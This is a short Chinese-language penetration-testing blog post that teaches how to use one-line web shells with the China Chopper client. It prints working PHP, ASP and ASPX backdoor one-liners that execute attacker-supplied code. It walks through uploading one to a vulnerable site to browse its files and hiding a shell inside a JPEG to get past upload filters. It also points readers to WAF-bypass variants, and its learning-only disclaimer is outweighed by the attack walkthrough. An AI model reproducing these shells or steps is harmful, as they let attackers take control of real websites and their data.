MENU

一句话木马与中国菜刀

October 5, 2018 • Read: 206 • 渗透测试

什么是一句话木马?

一句话木马就是一句简单的脚本语言,常见脚本语言的一句话木马如下

php:<?php @eval($_post['pass']);?>
asp:<%eval request ("pass")%>
aspx:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

这里没有放jsp的一句话木马,因为jsp的一句话比较复杂,想看的可以看这篇文章

一句话木马的使用

以php一句话为例,我们可以直接将这些语句插入到网站的某个php文件上,或者直接创建一个新的文件,在文件里写入一句话木马,然后把文件上传到网站上即可。

假设有个智障网站有这样的漏洞:

我们把这个phpma.php上传上去后,打开中国菜刀,在空白处鼠标右键,选择“添加选项”

编辑相关参数,包括一句话木马所在的URL以及密码,最后点击“编辑”

在URL中选中目标网站,点击鼠标右键,选择“文件管理”,就能看到网站的目录结构了

获取整个网站的目录了~然后就可以开始做坏事

图片一句话制作

如果网站限制了上传类型,.asp,.php上传不上出,但是可以上传图片,那么就可以使用图片隐写术将一句话木马安插在图片里,具体操作步骤是:
首先准备好一张图片,一个一句话木马,以及同路径下的dos窗口

然后输入DOS命令:copy 1.jpg+1.php 2.jpg

此时产生的2.jpg就是我们要的图片一句话木马

总结

其他类型的一句话木马也是一样的使用方法。当然,一般网站不可能这么容易就上传,肯定有防护机制,比方说安全狗防护,这时可以去网上搜过狗一句话等等。本博客仅供学习交流使用,不可用于任何违法行为中,学信息安全,保卫我国信息安全,爱我中国~

Archives Tip
QR Code for this page
Tipping QR Code